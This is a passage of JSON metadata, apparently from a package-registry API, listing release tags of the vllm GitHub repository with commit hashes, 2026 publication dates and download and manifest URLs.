"html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.24.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.24.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.24.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.24.0rc1/manifests"},{"name":"v0.23.0","sha":"0fc695fc6d1d82e9a5ac6835ac8e4e1c83703665","kind":"commit","published_at":"2026-06-15T03:35:17.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.23.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.23.0/manifests"},{"name":"v0.23.1rc0","sha":"e3e3cd54589cee689b785aab5bda81b3e4203191","kind":"commit","published_at":"2026-06-15T02:35:24.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.23.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.23.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.23.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.23.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.23.1rc0/manifests"},{"name":"v0.23.0rc2","sha":"78743ab5bffd381e88f97e1c8ba20473b0ae6d75","kind":"commit","published_at":"2026-06-11T23:24:31.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.23.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.23.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.23.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.23.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.23.0rc2/manifests"},{"name":"v0.22.1","sha":"0decac0d96c42b49572498019f0a0e3600f50398","kind":"commit","published_at":"2026-06-04T00:11:47.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.22.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.1/manifests"},{"name":"v0.22.1rc2","sha":"0decac0d96c42b49572498019f0a0e3600f50398","kind":"commit","published_at":"2026-06-04T00:11:47.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.22.1rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.22.1rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.22.1rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.1rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.1rc2/manifests"},{"name":"v0.22.1rc1","sha":"b284862ea9b8413d21e4b4dd1eb46f8ba3e40627","kind":"commit","published_at":"2026-06-03T02:02:03.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.22.1rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.22.1rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.22.1rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.1rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.1rc1/manifests"},{"name":"v0.22.1rc0","sha":"6aabe221a56052965e6bb0a95e9ec682d046a6e7","kind":"commit","published_at":"2026-05-29T18:58:25.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.22.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.22.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.22.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.1rc0/manifests"},{"name":"v0.22.0","sha":"0b3ba88f165976e77ca5e6a7a3f5bba4562b80af","kind":"commit","published_at":"2026-05-29T09:28:43.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.22.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.0/manifests"},{"name":"v0.22.0rc3","sha":"799c3afa5d5b17b676d04e0b58a5628943bb4003","kind":"commit","published_at":"2026-05-28T07:11:54.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.22.0rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.22.0rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.22.0rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.0rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.0rc3/manifests"},{"name":"v0.22.0rc2","sha":"40cf0206bae58400bd20a16320ed90309eae4311","kind":"commit","published_at":"2026-05-27T21:20:37.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.22.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.22.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.22.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.0rc2/manifests"},{"name":"v0.22.0rc1","sha":"a94cd6d98fd1709f2ad3916274f0f3a88e01485a","kind":"commit","published_at":"2026-05-27T07:37:22.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.22.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.22.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.22.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.22.0rc1/manifests"},{"name":"v0.21.1rc0","sha":"d735968f6d634ec849268f18e3b84ceb494fee79","kind":"commit","published_at":"2026-05-15T08:49:27.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.21.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.21.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.21.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.1rc0/manifests"},{"name":"v0.21.0","sha":"ad7125a431e176d4161099480a66f0169609a690","kind":"commit","published_at":"2026-05-15T04:28:34.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.21.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.0/manifests"},{"name":"v0.21.0rc3","sha":"800604bf53c05b7a11855b4202f2a7e3b6737e5c","kind":"commit","published_at":"2026-05-14T07:59:51.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.21.0rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.21.0rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.21.0rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.0rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.0rc3/manifests"},{"name":"v0.21.0rc2","sha":"135453b715589014dbe1054ba63819acc1878eb6","kind":"commit","published_at":"2026-05-13T09:03:17.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.21.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.21.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.21.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.0rc2/manifests"},{"name":"v0.21.0rc1","sha":"d801ae8c2650b590438f3d9794dd7a47abd86c9a","kind":"commit","published_at":"2026-05-12T21:57:17.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.21.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.21.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.21.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.21.0rc1/manifests"},{"name":"v0.20.2","sha":"bc150f50299199599673614f80d12a196f377655","kind":"commit","published_at":"2026-05-08T01:25:36.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.20.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"132765e3560659ff63ebd236203672e991b70e08","kind":"commit","published_at":"2026-05-04T08:56:49.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.20.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.1/manifests"},{"name":"v0.20.2rc0","sha":"e6ff3e9c83a6520c3793f4e0511ac8591a07c243","kind":"commit","published_at":"2026-05-03T04:06:30.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.20.2rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.20.2rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.20.2rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.2rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.2rc0/manifests"},{"name":"v0.20.0","sha":"88d34c6409e9fb3c7b8ca0c04756f061d2099eb1","kind":"commit","published_at":"2026-04-27T19:04:32.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.20.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.0/manifests"},{"name":"v0.20.1rc0","sha":"ebf862c351dc4bcaf65de34c3caebe6df6e9e214","kind":"commit","published_at":"2026-04-27T08:17:52.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.20.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.20.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.20.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.1rc0/manifests"},{"name":"v0.20.0rc1","sha":"5a532c7e0b8b07d9715e64e3ca3546d7b9e5b35a","kind":"commit","published_at":"2026-04-22T09:00:47.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.20.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.20.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.20.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.20.0rc1/manifests"},{"name":"v0.19.2rc0","sha":"aeee7ef9391028939afd08e20c12a1e279efbdf1","kind":"commit","published_at":"2026-04-18T05:34:33.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.19.2rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.19.2rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.19.2rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.2rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.2rc0/manifests"},{"name":"v0.19.1","sha":"b1388b1fbf5aaef47937fabe98931211684666a6","kind":"commit","published_at":"2026-04-18T00:57:52.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.19.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.1/manifests"},{"name":"v0.19.1rc0","sha":"550643541956cf913a2346f69af3be89c5c93a6b","kind":"commit","published_at":"2026-04-03T05:47:02.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.19.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.19.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.19.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.1rc0/manifests"},{"name":"v0.19.0","sha":"2a69949bdadf0e8942b7a1619b229cb475beef20","kind":"commit","published_at":"2026-04-02T23:45:38.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.19.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.0/manifests"},{"name":"v0.19.0rc1","sha":"c284a6671cf402128eedc7cbd37cd6a62346013c","kind":"commit","published_at":"2026-04-01T19:11:03.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.19.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.19.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.19.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.0rc1/manifests"},{"name":"v0.19.0rc0","sha":"1dbbafd3f34ab5ca9394e719a4e290f60252f401","kind":"commit","published_at":"2026-04-01T08:03:14.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.19.0rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.19.0rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.19.0rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.0rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.19.0rc0/manifests"},{"name":"v0.18.2rc0","sha":"b6e636c12c28c9ae83e22c65b4fca64a5571483b","kind":"commit","published_at":"2026-03-31T15:50:41.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.18.2rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.18.2rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.18.2rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.2rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.2rc0/manifests"},{"name":"v0.18.1","sha":"a26e8dc7ff2111a005144d775ecf9cebf56c45b2","kind":"commit","published_at":"2026-03-30T19:42:26.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.18.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.1/manifests"},{"name":"v0.18.1rc0","sha":"298e5108482e52fed40de315011c30e08342c979","kind":"commit","published_at":"2026-03-21T09:29:43.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.18.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.18.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.18.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.1rc0/manifests"},{"name":"v0.18.0","sha":"bcf2be96120005e9aea171927f85055a6a5c0cf6","kind":"commit","published_at":"2026-03-19T22:06:38.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.18.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.0/manifests"},{"name":"v0.18.0rc2","sha":"89138b21cc246ae944c741d5c399c148e2b770ab","kind":"commit","published_at":"2026-03-19T01:44:16.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.18.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.18.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.18.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.0rc2/manifests"},{"name":"v0.18.0rc1","sha":"262ddd0d81a1e4687e209f988d6ea32616e736fa","kind":"commit","published_at":"2026-03-18T08:48:32.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.18.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.18.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.18.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.0rc1/manifests"},{"name":"v0.17.2rc0","sha":"54a62a79f70982742a227c845b96148e6401d0e7","kind":"commit","published_at":"2026-03-17T03:34:49.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.17.2rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.17.2rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.17.2rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.2rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.2rc0/manifests"},{"name":"v0.18.0rc0","sha":"2dccb38f73fa79bc629b8b215b8066e61ce4a211","kind":"commit","published_at":"2026-03-16T20:51:04.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.18.0rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.18.0rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.18.0rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.0rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.18.0rc0/manifests"},{"name":"v0.17.1","sha":"95c0f928cdeeaa21c4906e73cee6a156e1b3b995","kind":"commit","published_at":"2026-03-11T09:51:18.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.17.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.1/manifests"},{"name":"v0.17.1rc0","sha":"f83b933b84b85ee54121575fc347881b35090616","kind":"commit","published_at":"2026-03-10T16:18:28.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.17.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.17.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.17.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.1rc0/manifests"},{"name":"v0.17.0","sha":"b31e9326a7d9394aab8c767f8ebe225c65594b60","kind":"commit","published_at":"2026-03-06T21:04:15.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.17.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.0/manifests"},{"name":"v0.17.0rc1","sha":"b31e9326a7d9394aab8c767f8ebe225c65594b60","kind":"commit","published_at":"2026-03-06T21:04:15.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.17.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.17.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.17.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.0rc1/manifests"},{"name":"v0.17.0rc0","sha":"097eb544e9a22810c9b7a59e586b61627b308362","kind":"commit","published_at":"2026-03-04T05:54:32.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.17.0rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.17.0rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.17.0rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.0rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.17.0rc0/manifests"},{"name":"v0.16.1rc0","sha":"3827c8c55aaa6622fd96b0c846a38b94444ebb80","kind":"commit","published_at":"2026-02-26T09:14:07.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.16.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.16.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.16.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.1rc0/manifests"},{"name":"v0.16.0","sha":"89a77b10846fd96273cce78d86d2556ea582d26e","kind":"commit","published_at":"2026-02-25T04:30:22.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.16.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0/manifests"},{"name":"v0.16.0rc3","sha":"7a06e5b05b170d7da31845866da0a99fc65253a1","kind":"commit","published_at":"2026-02-12T04:54:27.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.16.0rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.16.0rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.16.0rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0rc3/manifests"},{"